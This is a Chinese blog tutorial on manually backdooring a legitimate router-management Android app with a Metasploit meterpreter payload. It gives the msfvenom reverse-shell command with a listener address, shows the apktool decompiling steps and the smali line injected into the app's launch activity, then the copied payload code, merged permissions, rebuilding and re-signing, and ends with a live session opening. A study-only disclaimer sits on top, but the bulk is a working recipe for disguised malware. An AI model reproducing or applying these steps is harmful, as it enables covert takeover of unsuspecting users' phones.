android反编译工具mercury,手动给APP添加backdoor(msf)

最新推荐文章于 2022-08-29 15:48:34 发布
最新推荐文章于 2022-08-29 15:48:34 发布
阅读量536 收藏 11
点赞数
文章标签: android反编译工具mercury

本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!!

77a7ffe7ad4d6d63dccb4b1761c6326f.png

前期的准备某路由器管理APP(luyou.apk)

kali Linux

手机(android 10)

01 生成Android shell

在生成之前,确定本机的ip地址。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk

这样我们便生成了一个名为66.apk的android shell

b2b983cf049d1d3c603f9a6ec6e81172.png

02 反编译刚才生成的shell和正常appapktool d 66.apk

apktool d luyou.apk

b2b983cf049d1d3c603f9a6ec6e81172.png

反编译后的效果

7394243705a55b30140fd0273f7516e1.png

03 注入PAYLOAD

-1 进入luyou文件夹,打开AndroidManifest.xml文件

-2 搜索关键字Launch和Main找到所对应启动的smail文件,说白了就是找app启动文件路径

66c6edda229efec81f8aa2e98eceb368.png

当前的启动路径为:com/mercury/mercuryrouterLaunchActivity

打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

928f2ddc62303483c63f568f1a14a1a9.png

04 将木马文件中的smali文件复制到载体smali文件夹中cp -r 66/smali/com/* luyou/smali/com/

05添加权限

打开木马AndroidManifest.xml文件

复制以

开头的所有代码按照格式复制到载体luyou的AndroidManifest.xml文件中,删除重复权限就ok

e6fa4a102b61416f2fc888674530dab9.png

06回遍apktool b luyou

7394243705a55b30140fd0273f7516e1.png

07签名

这样我们的app添加就算完成了,但是在手机是无法运行的。因为没有签名。

生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

签名:jarsigner -keystore mykey.keystore luyou.apk alias_name -s

08 测试

安装app

e9df302e934a789f37ede2d6362c0407.png

msf终端成功上线

d3cd610c71215d6b2530c81e01a7ba70.png

版权属于:逍遥子大表哥

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

weixin_39600510
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AndroidKiller介绍与使用
YJJYXM的博客
09-25 8291
往期推荐 什么是虚拟机?虚拟机有那几种 APK安装流程及详细步骤 APK打包流程 APK文件结构 Android开发之数据储存 APK属于压缩文件,不可以通过直接解压的方式来获取明文内容,需要借助AndroidKiller这类的第三方的工具。 1.1 AndroidKiller介绍、环境配置 AndroidKiller是一款经常用来反编译APK的工具。 1.“AndroidKiller”的文件夹目录结构,如图1.1所示,双击打开“AndroidKiller.exe”文件,此时,会弹出一个窗口,如图1.2所
mercury android平台安全评估框架软件
05-30
mercury android平台安全评估框架软件
android 反编译工具
09-01 6096
1、smali-1.2.6.jar 用途:.smali文件 转成 classes.dex文件 说明:.smali文件,类似于.class文件,可以用普通文本编辑器查看和修改。 用法举例:命令行:java -jar smali.jar classout/ -o classes
android 反编译全套工具
weixin_40399147的博客
08-29 2401
android 反编译工具
android 安全评估框架Mercury (1) 安装
hoodbc博客
09-08 657
Mercury 由两部分组成,分别运行与PC和Android设备上。下图是一个简单的通信概述图: [img]http://dl.iteye.com/upload/attachment/0073/7722/7a60dc79-f8db-3e87-a4ba-2d92fb48896f.png[/img] 安装 client 的时候必须要python2.7.x版本。否则会报一个hashl...
drozer-agent:Mercury安全评估框架的Android代理
02-02
drozer(以前为Mercury)是Android的领先安全测试框架。 drozer允许您通过承担应用程序的角色并与Dalvik VM,其他应用程序的IPC端点和基础操作系统进行交互来搜索应用程序和设备中的安全漏洞。 drozer提供了可帮助...
软件测试工具Kintana:Mercury的变更管理工具
03-23
mercuryMercury软件测试工具Kintana:Mercury的变更管理工具Kintana是Mercury的变更管理工具。整个流程中涉及到的角色有:IT经理,项目经理,业务专家,开发人员,QA经理,自动化测试工程师。具体流程,所有涉及到的...
Mercury 浏览器 2.1.0
01-11
Mercury 浏览器 2.1.0 件名称:Mercury 浏览器 APK名称:com.ilegendsoft.mercury 最新版本:2.1.0 支持ROM:2.3及更高版本 界面语言:简体中文 软件大小:14.03 M 开发者:iLegendsoft,Inc. 应用简介 ··· 作为...
汞:简单的Android应用,可通过SSH将预配置的命令发送到远程服务器
02-03
Mercury-SSH指挥官简单的Android应用程序,可通过SSH将预配置的命令发送到远程服务器。用法查看 ,了解如何配置和使用Mercury-SSH。局限性该应用旨在用作简单的远程工具,因此不支持交互式命令和输出处理。执照该...
android 反编译工具 比较,常见反编译器对比
weixin_35964207的博客
05-25 703
常见反编译器对比下面就去对比常见的安卓的java反编译器的效果和优缺点。JD-GUI vs (基于Procyon的)Luyten对比项JD-GUILuyten流行程度比较广->大家用的比较多一般->相对使用的人不是很多jar转java的准确率高->jd-gui代码转换出错Error很高->Luyten中可正确解析显示源码:显示:整体UI界面和代码高亮比较简单和朴素->...
jd-gui,akpToolkit,smali.jar文件Android反编译工具
04-27
我们在开发 安卓中,有时需要对其他apk文件进行反编译,以便我们方便进行学习交流研究使用。 我们使用 Android SDK 默认生成的工程会自动添加一些类到我们的工程中。这些类在程序发布后会仍然保留在apk 文件中。 我们对其进行反编译后 可以发现 会有Smali后缀名的文件。我们怎么对他进行反编译城Java文件,并让我们看懂呢?下面进行一下简单介绍:
msfvenom-backdoor-android:Android后门应用程序,msfvenom android .apk的改进源代码-Android app source code
03-24
msfvenom-backdoor-androidAndroid Studio项目包含由生成的后门.apk的源代码 $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk (在Kali Linux套件中) 有关渗透到Android系统的过程指南,请访问我的网站(仅意大利语) 尝试解决问题: [*]Meterpreter session x closed - Reason:died 消息,通过在服务中启动有效负载来实现。 Meterpreter会话以这种方式更加稳定(原始的msfvenom apk通常会导致会话很快终止) 在此项目中,后门可在LAN设置中工作,在端口4444上打开到192.168.178.30的Meterpreter会话(如果要在WA
AndroidKiller超好用反编译工具.zip
03-06
AndroidKiller超好用反编译工具
反编译完全版EX4-MQL 4.0.509.5,可反编译加密程序
04-19
反编译完全版EX4-MQL 4.0.509.5,可反编译加密程序,非常好用
android反编译工具全套(apktool、Android逆向助手、jd-gui)
01-30
反编译三部曲: 1.apk-->项目结构:通过apktool反编译将整个apk解压成完整的项目结构 2.apk->dex: 通过Android逆向助手将apk反编译成dex 3.dex->jar:通过Android逆向助手将dex反编译成jar 4.jar>查看代码,通过jd-gui查看jar包源码,并可导出源码。
java反编译工具_JAVA反编译工具集锦
weixin_39921689的博客
11-14 75
Procyon作者:Mike Strobel2015年更新。处理Java 5及更高版本(包括Java 8)的语言增强功能,包括:Enum声明Enum和String switch语句本地类(匿名和命名)注释Java 8 Lambdas和方法引用(即::运算符)。 Java 7需要运行。CFR作者:Lee Benfield更新于2015年.CFR能够反编译现代Java功能 - Java 8 lambd...
Android库分析工具(崩溃反编译
weixin_34059951的博客
08-31 118
[时间:2016-07] [状态:Open] [关键词:android, 动态库,静态库, 编译,crash,addr2line] 本文主要整理Android编译系统中可用的库分析工作,可作为后续代码崩溃分析的参考。 动态库(*.so)处理: arm-linux-androideabi-readelf.exe -a XX.so > xx.txt 输出所有导出函数 arm-linux-an...
android反编译工具推荐,Android反编译工具集合
weixin_39871162的博客
05-25 442
反编译工具的使用——道高一尺魔高一丈1.apktoolimage.png图中显示的是我们反编译所使用到的最重要的apktool工具的所有版本。2.dex2jarimage.png3.jadimage.png4.jadximage.png5.JD-GUIimage.png道高一尺魔高一丈每当编译变得更厉害一点的时候,这些反编译工具也会跟进更新。所以,当你反编译出错,不能成功的话,那么就检查一下反编...
Android反编译工具和方法介绍
凹凸曼的专栏
07-09 1629
反编译我们都知道,Android程序打完包之后得到的是一个APK文件,这个文件是可以直接安装到任何Android手机上的,我们反编译其实也就是对这个APK文件进行反编译Android反编译主要又分为两个部分,一个是对代码的反编译,一个是对资源的反编译,我们马上来逐个学习一下。 在开始学习之前,首先我们需要准备一个APK文件,为了尊重所有开发者,我就不拿任何一个市面上的软件来演示了,而是自己写
junit Mercury
最新发布
05-17
JUnit Mercury 是一个Java测试框架,它是JUnit5的一部分,旨在提供额外的测试功能和扩展。它支持动态测试,参数化测试以及自定义扩展。JUnit Mercury 还提供了JUnit Platform Launcher API,可用于在不同的环境中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值